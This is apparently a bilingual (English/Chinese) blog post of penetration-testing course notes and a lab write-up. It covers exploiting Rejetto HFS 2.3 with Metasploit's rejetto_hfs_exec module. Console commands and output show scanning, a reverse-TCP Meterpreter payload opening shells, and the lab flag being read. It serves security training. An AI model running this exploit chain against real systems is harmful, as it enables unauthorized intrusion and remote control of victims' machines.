Exploiting A Vulnerable HTTP File Server
An HTTP File Server (HFS) is a web server that is designed for file & document sharing.
HTTP File Servers typically run on TCP port 80 and utilize the HTTP protocol for underlying communication.
Rejetto HFS is a popular free and open source HTTP file server that can be setup on both Windows and Linux.
Rejetto HFS V2.3 is vulnerable to a remote command execution attack.
MSF has an exploit module that we can utilize to gain access to the target system hosting the HSF.
利用易受攻击的 HTTP 文件服务器
HTTP 文件服务器 (HFS) 是一种专为文件和文档共享而设计的 Web 服务器。
HTTP 文件服务器通常在 TCP 端口 80 上运行,并利用 HTTP 协议进行基础通信。
Rejetto HFS 是一种流行的免费开源 HTTP 文件服务器,可以在 Windows 和 Linux 上设置。
Rejetto HFS V2.3 容易受到远程命令执行攻击。
MSF 有一个漏洞利用模块,我们可以利用它来访问托管 HSF 的目标系统。
Demo: Exploiting A Vulnerable HTTP File Server(演示:利用易受攻击的 HTTP 文件服务器)
The exploitation process is going to be a combination of all the previous sections that we’ve explored. First and foremost, we are going to perform some port scanning and enumeration on the target to identify whether or not there is an HTTP File Server running on the target. We are then going to enumerate the version of the HTTP File Server. And in this case, it should be Rejetto HFS 2.3. We are then going to load or search for the relevant exploit module, configure it, and then exploit it. And we should get a Meterpreter session.
Target IP Address: 10.2.24.160
Ensure that the PostgreSQL database service is started. That’ll ensure that we can communicate with the Metasploit Framework database and create our workspaces.
1
service postgresql start
Start up the Metasploit Framework console.
1
msfconsole
Check the status of the database to ensure that we are connected.
1
db_status
Create a workspace called HFS.
1
workspace -a HFS
We are currently working within the HFS workspace.
Set up the global variable for the RHOST option, so that we don’t need to specify the target IP whenever we want to load a module. It’s going to set the target IP for every module that we load.
1
setg RHOSTS 10.2.24.160
We’re going to perform an Nmap scan and store the results directly into the Metasploit Framework database.
-sS
: Perform a SYN scan.
-sV
: Perform service version detection.
-O
: Perform operating system detection.
That is going to start the Nmap scan and it’ll store the Nmap scan results directly into the Metasploit Framework database in our current workspace. So we’ll be able to analyze the results directly from MSFConsole.
1
db_nmap -sS -sV -O 10.2.24.160
Access the port 80 within our browser just to confirm that we indeed have HFS running.
1
http://10.2.24.160
We have the Rejetto HTTP File Server version 2.3 running on port 80, as well as a few other services. From the Nmap scan, we’re also able to deduce the target operating system. And in this case, we can see it’s running Windows Server 2008 R2, which is very important when we will be specifying the Meterpreter payload and the platform that we want to utilize with the Meterpreter payload when utilizing the exploit module.
Now that we have an idea of what HTTP File Server is running on the target system, as well as the version, we can search or perform some vulnerability scanning directly through MSFConsole.
1
search type:exploit name:rejetto
1
2
3
4
use exploit/windows/http/rejetto_hfs_exec
show options
info
run
It automatically opens up a Meterpreter session.
1
2
3
4
5
meterpreter > sysinfo
...
Architecture : x64
Meterpreter : x86/windows
meterpreter > exit
We were able to obtain a Meterpreter session without specifying a payload. The reason that was the case is because we have two options that we can specify for this module.
SRVHOST
: This is the local host to listen on. This must be an address on the local machine that’s used to deliver the payload.
SRVPORT
We can change the type of payload that we’re utilizing based on the operating system architecture we want.
1
2
3
set payload windows/x64/meterpreter/reverse_tcp
show options
run
We have a 64-bit Meterpreter session as opposed to previously, when the default payload specified was the 32-bit Meterpreter payload.
1
2
3
4
meterpreter > sysinfo
...
Architecture : x64
Meterpreter : x64/windows
You can always customize the payload you use for every exploit module based on the target operating system, as well as the architecture.
That is how to exploit a vulnerable HTTP File Server.
Windows: HTTP File Server
Overview
A Kali GUI machine and a target machine running a vulnerable HTTP File Server server are provided to you. The IP address of the target machine is provided in a text file named target placed on the Desktop of the Kali machine (/root/Desktop/target).
Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.
Objective: Exploit the application and retrieve the flag!
Instructions:
- Your Kali machine has an interface with IP address 10.10.X.Y. Run “ip addr” to know the values of X and Y.
- The IP address of the target machine is mentioned in the file “/root/Desktop/target”
- Do not attack the gateway located at IP address 192.V.W.1 and 10.10.X.1
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1945.pdf
我自己的思路
1
Target IP Address : 10.0.19.137
1
2
3
4
5
6
7
8
9
10
root@attackdefense:~# service postgresql start
Starting PostgreSQL 12 database server: main.
root@attackdefense:~# msfconsole -q
msf5 > db_status
[*] Connected to msf. Connection type: postgresql.
msf5 > workspace -a hfs
[*] Added workspace: hfs
[*] Workspace: hfs
msf5 > set RHOSTS 10.0.19.137
RHOSTS => 10.0.19.137
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf5 > db_nmap -sS -sV -O 10.0.19.137
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-01-23 17:47 IST
[*] Nmap: Nmap scan report for 10.0.19.137
[*] Nmap: Host is up (0.0029s latency).
[*] Nmap: Not shown: 991 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 80/tcp open http HttpFileServer httpd 2.3
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp open ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC
[*] Nmap: No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
[*] Nmap: TCP/IP fingerprint:
[*] Nmap: OS:SCAN(V=7.70%E=4%D=1/23%OT=80%CT=1%CU=34221%PV=Y%DS=3%DC=I%G=Y%TM=63CE7B2
[*] Nmap: OS:8%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10D%TI=I%CI=I%II=I%SS=S%TS=
[*] Nmap: OS:7)OPS(O1=M546NW8ST11%O2=M546NW8ST11%O3=M546NW8NNT11%O4=M546NW8ST11%O5=M5
[*] Nmap: OS:46NW8ST11%O6=M546ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
[*] Nmap: OS:0)ECN(R=Y%DF=Y%T=7F%W=2000%O=M546NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=7F%S=O%A=S
[*] Nmap: OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=7F%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
[*] Nmap: OS:T=7F%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=7F%W=0%S=A%A=O%F=R%O=%RD=
[*] Nmap: OS:0%Q=)T5(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=7F%W=0%
[*] Nmap: OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=7F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
[*] Nmap: OS:R=Y%DF=N%T=7F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
[*] Nmap: OS:N%T=7F%CD=Z)
[*] Nmap: Network Distance: 3 hops
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 86.99 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
msf5 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
10.0.19.137 Windows 8.1 client
msf5 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
10.0.19.137 80 tcp http open HttpFileServer httpd 2.3
10.0.19.137 135 tcp msrpc open Microsoft Windows RPC
10.0.19.137 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
10.0.19.137 445 tcp microsoft-ds open Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
10.0.19.137 3389 tcp ssl/ms-wbt-server open
10.0.19.137 49152 tcp msrpc open Microsoft Windows RPC
10.0.19.137 49153 tcp msrpc open Microsoft Windows RPC
10.0.19.137 49154 tcp msrpc open Microsoft Windows RPC
10.0.19.137 49155 tcp msrpc open Microsoft Windows RPC
1
2
3
4
5
6
7
8
msf5 > search type:exploit name:rejetto
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Rejetto HttpFileServer Remote Command Execution
Rejetto HttpFileServer 远程命令执行
由于文件 ParserLib.pas 中的正则表达式不佳,Rejetto HttpFileServer (HFS) 容易受到远程命令执行攻击。该模块通过使用“%00”绕过过滤来利用 HFS 脚本命令。此模块已在 Windows XP SP3、Windows 7 SP1 和 Windows 8 上的 HFS 2.3b 上成功测试。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 > use exploit/windows/http/rejetto_hfs_exec
msf5 exploit(windows/http/rejetto_hfs_exec) > show options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.19.137 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf5 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Using URL: http://0.0.0.0:8080/dd0dlD
[*] Local IP: http://10.10.16.5:8080/dd0dlD
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /dd0dlD
[*] Sending stage (180291 bytes) to 10.0.19.137
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.0.19.137:49623) at 2023-01-23 18:06:25 +0530
[!] Tried to delete %TEMP%\AhmCpAHBTgeesQ.vbs, unknown result
[*] Server stopped.
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
msf5 exploit(windows/http/rejetto_hfs_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > run
[*] Started reverse TCP handler on 10.10.16.5:4444
[*] Using URL: http://0.0.0.0:8080/WGC9TXBGdHuXMWN
[*] Local IP: http://10.10.16.5:8080/WGC9TXBGdHuXMWN
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /WGC9TXBGdHuXMWN
[*] Sending stage (206403 bytes) to 10.0.19.137
[*] Meterpreter session 2 opened (10.10.16.5:4444 -> 10.0.19.137:49686) at 2023-01-23 18:10:06 +0530
[!] Tried to delete %TEMP%\xXApgs.vbs, unknown result
[*] Server stopped.
meterpreter > sysinfo
Computer : WIN-OMCNBKR66MN
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
1
2
3
4
5
6
meterpreter > search -f flag*
Found 2 results...
c:\flag.txt (32 bytes)
c:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\flag.txt.lnk (481 bytes)
meterpreter > cat c:\\flag.txt
f74c8347798f4082daf4b4570dba094a
-
Previous
Automating Metasploit With Resource Scripts -
Next
Exploiting Windows MS17-010 SMB Vulnerability